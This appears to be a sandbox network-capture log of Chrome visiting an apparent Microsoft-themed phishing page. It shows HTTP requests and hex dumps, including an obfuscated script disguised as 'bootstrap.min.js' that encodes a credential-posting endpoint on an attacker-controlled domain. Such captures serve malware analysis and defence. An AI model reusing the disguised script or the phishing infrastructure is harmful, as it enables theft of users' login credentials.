                                                                                                                  cf-cdnjs-via: cfworker
                                                                                                                  CF-Cache-Status: MISS
                                                                                                                  Expires: Tue, 22 Oct 2024 18:08:39 GMT
                                                                                                                  Cache-Control: public, max-age=14400
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHi8xveK8X3zmjMMsaI56NaBRpVCFoAEI9CfpJtWHkJs%2FZ3%2Fhj3qYWd5bZ43HQqp1itDOxLLbyV2vXma0KU%2BZ3rKc0yO7GDIXr21tncTbAQDlZoC3YLubCZFuGgHqWul4GHFUHsb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f863bdf6b05-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:39 UTC18INData Raw: 72 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                  Data Ascii: resource not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.1649774162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:40 UTC638OUTPOST /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 13
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:40 UTC13OUTData Raw: 64 6f 3d 75 73 65 72 2d 63 68 65 63 6b
                                                                                                                  Data Ascii: do=user-check
                                                                                                                  2024-10-22 14:08:41 UTC292INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:39 GMT
                                                                                                                  Server: Apache
                                                                                                                  Access-Control-Allow-Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  2024-10-22 14:08:41 UTC27INData Raw: 31 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 10{"status":false}0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.1649773162.62.150.1874432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:40 UTC391OUTGET /bootstrap.min.js HTTP/1.1
                                                                                                                  Host: 5102487645-1323985617.cos.eu-frankfurt.myqcloud.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:40 UTC425INHTTP/1.1 200 OK
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Content-Length: 553296
                                                                                                                  Connection: close
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Disposition: attachment
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:40 GMT
                                                                                                                  ETag: "34612323af677d49270e6accc3887f01"
                                                                                                                  Last-Modified: Mon, 30 Sep 2024 13:23:44 GMT
                                                                                                                  Server: tencent-cos
                                                                                                                  x-cos-force-download: true
                                                                                                                  x-cos-hash-crc64ecma: 5505436874855358963
                                                                                                                  x-cos-request-id: NjcxN2IxZThfNDE4MDYwOV8xMzA4Ml81NmM1OTc=
                                                                                                                  2024-10-22 14:08:40 UTC15959INData Raw: 76 61 72 20 66 69 6c 65 20 3d 20 22 61 48 52 30 63 48 4d 36 4c 79 38 31 4d 54 41 79 4e 44 67 33 4e 6a 51 31 4c 6d 31 35 4c 6d 6c 6b 4c 32 35 6c 65 48 51 75 63 47 68 77 22 3b 0d 0a 0d 0a 76 61 72 20 5f 30 78 35 35 61 32 61 34 3d 5f 30 78 32 63 31 33 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 62 31 39 28 29 7b 76 61 72 20 5f 30 78 34 39 36 36 65 31 3d 5b 27 78 2d 6c 67 2d 72 6f 77 5c 78 32 30 7b 27 2c 27 63 6f 6c 6f 72 3a 5c 78 32 30 74 72 61 27 2c 27 64 69 76 5c 78 32 30 69 64 3d 5c 78 32 32 6d 61 27 2c 27 2d 6c 67 2d 30 5c 78 32 30 7b 5c 78 32 30 6d 61 27 2c 27 7e 2e 76 61 6c 69 64 2d 74 6f 27 2c 27 31 7c 34 7c 30 7c 32 7c 36 7c 27 2c 27 6e 2d 74 6f 70 3a 5c 78 32 30 31 2e 35 27 2c 27 3a 66 6f 63 75 73 2c 5c 78 32 30 2e 66 27 2c 27 6e 69 6e 67 5c 78 32 30
                                                                                                                  Data Ascii: var file = "aHR0cHM6Ly81MTAyNDg3NjQ1Lm15LmlkL25leHQucGhw";var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20
                                                                                                                  2024-10-22 14:08:40 UTC4INData Raw: 7d 5c 78 32
                                                                                                                  Data Ascii: }\x2
                                                                                                                  2024-10-22 14:08:40 UTC8184INData Raw: 30 2e 27 2c 27 6c 69 64 5c 78 32 30 23 64 65 65 32 65 27 2c 27 61 63 65 2d 61 72 6f 75 6e 64 27 2c 27 75 73 2c 5c 78 32 30 61 2e 62 67 2d 77 27 2c 27 61 28 30 2c 5c 78 32 30 31 32 33 2c 5c 78 32 30 27 2c 27 53 79 6d 62 6f 6c 5c 78 32 32 3b 5c 78 32 30 2d 27 2c 27 6f 6e 3a 5c 78 32 30 72 6f 77 5c 78 32 30 21 69 27 2c 27 5c 78 32 37 2c 5c 78 32 37 53 65 67 6f 65 5c 78 32 30 55 27 2c 27 61 6c 65 72 74 2d 6c 69 67 68 27 2c 27 6e 64 65 78 3a 5c 78 32 30 31 3b 5c 78 32 30 74 27 2c 27 75 70 2d 69 74 65 6d 2d 70 72 27 2c 27 74 65 64 5c 78 32 30 2e 63 75 73 74 6f 27 2c 27 6e 65 5c 78 32 30 2e 69 6e 70 75 74 2d 27 2c 27 69 6e 6b 4d 61 63 53 79 73 74 27 2c 27 73 70 61 6e 3e 57 65 5c 78 32 30 74 65 27 2c 27 68 57 4e 5a 66 27 2c 27 6c 75 74 65 5c 78 32 30 7d 5c 78 32
                                                                                                                  Data Ascii: 0.','lid\x20#dee2e','ace-around','us,\x20a.bg-w','a(0,\x20123,\x20','Symbol\x22;\x20-','on:\x20row\x20!i','\x27,\x27Segoe\x20U','alert-ligh','ndex:\x201;\x20t','up-item-pr','ted\x20.custo','ne\x20.input-','inkMacSyst','span>We\x20te','hWNZf','lute\x20}\x2
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 3a 5c 78 32 30 27 2c 27 64 2d 63 6c 69 70 3a 5c 78 32 30 62 6f 27 2c 27 32 35 35 2c 5c 78 32 30 2e 32 35 29 5c 78 32 30 27 2c 27 35 3b 5c 78 32 30 6f 72 64 65 72 3a 5c 78 32 30 27 2c 27 74 65 6e 74 3a 5c 78 32 30 63 65 6e 74 27 2c 27 31 30 5c 78 32 30 7b 5c 78 32 30 6d 61 72 67 69 27 2c 27 74 74 6f 6d 3a 5c 78 32 30 2e 35 72 65 27 2c 27 4e 43 4c 4d 75 27 2c 27 69 76 3e 5c 78 32 30 3c 2f 66 6f 72 6d 27 2c 27 74 65 72 6c 69 6d 69 74 3d 5c 78 32 37 27 2c 27 6d 61 72 67 69 6e 3a 5c 78 32 30 2e 35 27 2c 27 74 2d 68 69 64 65 5c 78 32 30 7b 5c 78 32 30 66 27 2c 27 6e 6f 6e 65 3b 5c 78 32 30 2d 6d 6f 7a 27 2c 27 72 6f 70 6c 65 66 74 5c 78 32 30 2e 64 27 2c 27 6c 69 64 5c 78 32 30 7b 5c 78 32 30 62 6f 72 64 27 2c 27 2e 70 6c 2d 35 2c 5c 78 32 30 2e 70 78 27 2c 27
                                                                                                                  Data Ascii: :\x20','d-clip:\x20bo','255,\x20.25)\x20','5;\x20order:\x20','tent:\x20cent','10\x20{\x20margi','ttom:\x20.5re','NCLMu','iv>\x20</form','terlimit=\x27','margin:\x20.5','t-hide\x20{\x20f','none;\x20-moz','ropleft\x20.d','lid\x20{\x20bord','.pl-5,\x20.px','
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 27 2c 27 5c 78 32 30 31 5c 78 32 30 7d 5c 78 32 30 2e 6f 72 64 65 27 2c 27 33 33 33 33 33 25 5c 78 32 30 7d 5c 78 32 30 2e 27 2c 27 5b 68 72 65 66 5d 3a 68 6f 76 27 2c 27 2d 70 6f 70 6f 76 65 72 2d 74 27 2c 27 6f 6e 3a 5c 78 32 30 72 6f 77 2d 72 65 27 2c 27 2e 74 61 62 6c 65 5c 78 32 30 74 68 65 27 2c 27 43 63 65 62 59 27 2c 27 74 69 70 6c 65 5d 29 2c 5c 78 32 30 2e 27 2c 27 23 6c 6f 61 64 65 72 27 2c 27 43 6f 6c 6f 72 5c 78 32 30 45 6d 6f 6a 27 2c 27 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 27 2c 27 76 65 72 74 69 63 61 6c 3e 2e 27 2c 27 25 2c 5c 78 32 30 30 2c 5c 78 32 30 30 29 3b 5c 78 32 30 27 2c 27 28 5b 73 69 7a 65 5d 29 3a 6e 27 2c 27 73 2d 70 6f 70 6f 76 65 72 2d 27 2c 27 6f 74 74 6f 6d 3a 5c 78 32 30 30 5c 78 32 30 21 27 2c 27 2d 62 6f 78 2d 70 61
                                                                                                                  Data Ascii: ','\x201\x20}\x20.orde','33333%\x20}\x20.','[href]:hov','-popover-t','on:\x20row-re','.table\x20the','CcebY','tiple]),\x20.','#loader','Color\x20Emoj','left:\x20auto','vertical>.','%,\x200,\x200);\x20','([size]):n','s-popover-','ottom:\x200\x20!','-box-pa
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 32 30 61 2e 74 65 78 74 2d 73 27 2c 27 6e 64 5c 78 32 30 7b 5c 78 32 30 2d 77 65 62 6b 27 2c 27 3a 5c 78 32 30 23 31 37 31 61 31 64 5c 78 32 30 27 2c 27 3d 5c 78 32 32 62 6f 78 5c 78 32 32 5c 78 32 30 69 64 3d 27 2c 27 69 63 61 6c 3e 2e 62 74 6e 3a 27 2c 27 2d 78 6c 2d 31 5c 78 32 30 7b 5c 78 32 30 2d 77 27 2c 27 73 68 6f 77 3e 2e 6e 61 76 2d 27 2c 27 6c 28 5c 78 32 32 64 61 74 61 3a 69 6d 27 2c 27 73 5c 78 32 30 7b 5c 78 32 30 63 6f 6c 6f 72 3a 27 2c 27 2d 65 78 70 61 6e 64 2d 78 6c 27 2c 27 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 32 30 27 2c 27 65 6c 70 3b 5c 78 32 30 62 6f 72 64 65 27 2c 27 5c 78 32 30 7d 5c 78 32 30 2e 63 6c 6f 73 65 3a 27 2c 27 3b 5c 78 32 30 74 65 78 74 2d 73 68 61 27 2c 27 23 65 39 65 63 65 66 3b 5c 78 32 30 6f 27 2c 27 3a 5c 78
                                                                                                                  Data Ascii: 20a.text-s','nd\x20{\x20-webk',':\x20#171a1d\x20','=\x22box\x22\x20id=','ical>.btn:','-xl-1\x20{\x20-w','show>.nav-','l(\x22data:im','s\x20{\x20color:','-expand-xl','th:\x20100%;\x20','elp;\x20borde','\x20}\x20.close:',';\x20text-sha','#e9ecef;\x20o',':\x
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 2e 39 5c 78 32 30 7d 5c 78 32 30 2e 27 2c 27 67 69 6e 3a 5c 78 32 30 2e 35 72 65 6d 27 2c 27 6c 74 69 70 5c 78 32 30 7b 5c 78 32 30 70 6f 73 27 2c 27 6c 74 69 70 2c 5c 78 32 30 2e 77 61 73 27 2c 27 3d 63 68 65 63 6b 62 6f 78 5d 27 2c 27 7b 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 27 2c 27 6e 61 34 65 4c 6a 35 4f 58 6d 27 2c 27 6b 69 64 61 4d 27 2c 27 74 69 70 5c 78 32 30 7b 5c 78 32 30 64 69 73 70 27 2c 27 2c 5c 78 32 30 36 33 70 78 29 5c 78 32 30 72 6f 27 2c 27 2e 37 35 72 65 6d 5c 78 32 30 31 2e 32 27 2c 27 7d 5c 78 32 30 5b 74 79 70 65 3d 62 75 27 2c 27 6f 72 73 5c 78 32 30 7b 5c 78 32 30 70 6f 73 69 27 2c 27 74 65 6e 74 3a 5c 78 32 30 73 70 61 63 27 2c 27 75 73 74 6f 6d 2d 72 61 64 69 27 2c 27 2e 33 72 65 6d 5c 78 32 30 2d 5c 78 32 30 31 70 27 2c 27 65 3a
                                                                                                                  Data Ascii: .9\x20}\x20.','gin:\x20.5rem','ltip\x20{\x20pos','ltip,\x20.was','=checkbox]','{\x20margin-l','na4eLj5OXm','kidaM','tip\x20{\x20disp',',\x2063px)\x20ro','.75rem\x201.2','}\x20[type=bu','ors\x20{\x20posi','tent:\x20spac','ustom-radi','.3rem\x20-\x201p','e:
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 70 75 74 2e 69 73 2d 69 27 2c 27 5b 74 79 70 65 3d 6d 6f 6e 74 27 2c 27 74 2d 69 6e 6c 69 6e 65 2d 69 27 2c 27 61 73 5c 78 32 30 66 61 2d 61 72 72 6f 27 2c 27 74 74 6f 6d 3a 5c 78 32 30 2e 32 35 72 27 2c 27 5c 78 32 30 6f 72 64 65 72 3a 5c 78 32 30 31 31 27 2c 27 65 66 74 2d 72 61 64 69 75 73 27 2c 27 36 77 52 34 33 4e 36 6b 39 54 27 2c 27 2d 67 72 6f 75 70 2d 70 72 65 27 2c 27 6e 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 27 2c 27 37 68 32 32 4d 34 5c 78 32 30 31 35 68 27 2c 27 55 41 41 41 41 42 41 41 41 41 27 2c 27 62 6f 78 2d 70 61 63 6b 3a 5c 78 32 30 27 2c 27 69 70 73 69 73 3b 5c 78 32 30 77 68 69 27 2c 27 6f 72 65 2c 5c 78 32 30 2e 62 73 2d 74 27 2c 27 74 68 3a 5c 78 32 30 39 31 2e 36 36 36 27 2c 27 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 27 2c 27
                                                                                                                  Data Ascii: put.is-i','[type=mont','t-inline-i','as\x20fa-arro','ttom:\x20.25r','\x20order:\x2011','eft-radius','6wR43N6k9T','-group-pre','n:\x20normal;','7h22M4\x2015h','UAAAABAAAA','box-pack:\x20','ipsis;\x20whi','ore,\x20.bs-t','th:\x2091.666','\x22display:\x20','
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 32 30 30 3b 5c 78 32 30 7a 2d 69 6e 64 65 27 2c 27 74 3b 5c 78 32 30 74 72 61 6e 73 69 74 27 2c 27 2d 64 69 61 6c 6f 67 5c 78 32 30 7b 5c 78 32 30 27 2c 27 74 69 76 65 5c 78 32 30 7b 5c 78 32 30 63 6f 6c 27 2c 27 64 69 73 70 6c 61 79 3a 5c 78 32 30 66 27 2c 27 6e 67 3a 5c 78 32 30 2e 32 35 72 65 6d 27 2c 27 3a 66 6f 63 75 73 2c 5c 78 32 30 2e 73 27 2c 27 43 41 73 4d 43 77 6f 4d 43 51 27 2c 27 68 69 74 65 3b 5c 78 32 30 7d 5c 78 32 30 7d 5c 78 32 30 27 2c 27 6e 67 3a 5c 78 32 30 30 3b 5c 78 32 30 6f 76 65 27 2c 27 2e 61 72 72 6f 77 2c 5c 78 32 30 2e 62 27 2c 27 70 3a 5c 78 32 30 31 2e 35 72 65 6d 5c 78 32 30 27 2c 27 69 6f 6e 3a 5c 78 32 30 74 72 61 6e 73 27 2c 27 75 6e 64 2d 63 6f 6c 6f 72 3a 27 2c 27 6c 67 2d 35 5c 78 32 30 7b 5c 78 32 30 70 61 64 27 2c
                                                                                                                  Data Ascii: 200;\x20z-inde','t;\x20transit','-dialog\x20{\x20','tive\x20{\x20col','display:\x20f','ng:\x20.25rem',':focus,\x20.s','CAsMCwoMCQ','hite;\x20}\x20}\x20','ng:\x200;\x20ove','.arrow,\x20.b','p:\x201.5rem\x20','ion:\x20trans','und-color:','lg-5\x20{\x20pad',
                                                                                                                  2024-10-22 14:08:41 UTC8184INData Raw: 3b 5c 78 32 30 27 2c 27 6d 3a 6c 61 73 74 2d 63 68 69 27 2c 27 66 69 72 73 74 5c 78 32 30 7b 5c 78 32 30 2d 77 27 2c 27 2e 35 72 65 6d 3b 5c 78 32 30 70 61 64 27 2c 27 73 65 63 6f 6e 64 61 72 79 3a 27 2c 27 67 3a 6e 6f 74 28 3a 64 69 73 27 2c 27 75 69 64 5c 78 32 30 7b 5c 78 32 30 70 61 64 64 27 2c 27 6d 61 72 67 69 6e 2d 62 6f 74 27 2c 27 5c 78 32 30 7d 5c 78 32 30 2e 64 72 6f 70 6c 65 27 2c 27 3b 5c 78 32 30 6d 61 72 67 69 6e 2d 74 27 2c 27 62 74 6e 3a 66 6f 63 75 73 2c 27 2c 27 65 66 74 3a 5c 78 32 30 37 35 25 5c 78 32 30 7d 27 2c 27 3d 5c 78 32 32 76 69 65 77 70 6f 72 74 27 2c 27 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 72 27 2c 27 6e 2d 73 65 6c 66 3a 5c 78 32 30 61 75 27 2c 27 76 62 61 72 2d 74 6f 67 67 6c 27 2c 27 23 63 6f 64 65 27 2c
                                                                                                                  Data Ascii: ;\x20','m:last-chi','first\x20{\x20-w','.5rem;\x20pad','secondary:','g:not(:dis','uid\x20{\x20padd','margin-bot','\x20}\x20.drople',';\x20margin-t','btn:focus,','eft:\x2075%\x20}','=\x22viewport','\x20sign\x20in\x20r','n-self:\x20au','vbar-toggl','#code',


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.1649776162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:42 UTC348OUTGET /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:43 UTC150INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:41 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.1649752188.114.97.34432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:44 UTC417OUTGET /yKKWd/bootstrap.min.css.map HTTP/1.1
                                                                                                                  Host: apeidieppe-d.basiic.net
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728
                                                                                                                  2024-10-22 14:08:45 UTC794INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:45 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94LAg2WpngPxh8V8opwdSyAa7XvKNFcqbdikRbaDDi6yq7cOnk8nOLZDwSZp4tei%2B31zGJIcUzuPQsLLPbRr%2FS%2F0tl6XmahvtkHxsCyT5F%2FVyECHWIcWgBUqP0P5ei2ovb2%2BT5S6Sbe1jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0fa899732cba-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=995&delivery_rate=1851662&cwnd=242&unsent_bytes=0&cid=bdc0e5ed543fef5b&ts=11847&x=0"
                                                                                                                  2024-10-22 14:08:45 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                  Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                  2024-10-22 14:08:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.164978013.107.253.724432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:45 UTC645OUTGET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                  Host: aadcdn.msauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:45 UTC737INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:45 GMT
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Content-Length: 17174
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                  Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT
                                                                                                                  ETag: 0x8D6410152A9D7E1
                                                                                                                  x-ms-request-id: 430036bf-c01e-0015-658b-24eb48000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  x-azure-ref: 20241022T140845Z-17fbfdc98bbpc9nz0r22pywp0800000004hg000000002336
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_MISS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-10-22 14:08:45 UTC15647INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                  Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                  2024-10-22 14:08:45 UTC1527INData Raw: 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0
                                                                                                                  Data Ascii: @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.164977913.107.253.724432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:45 UTC661OUTGET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                                                                                  Host: aadcdn.msauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
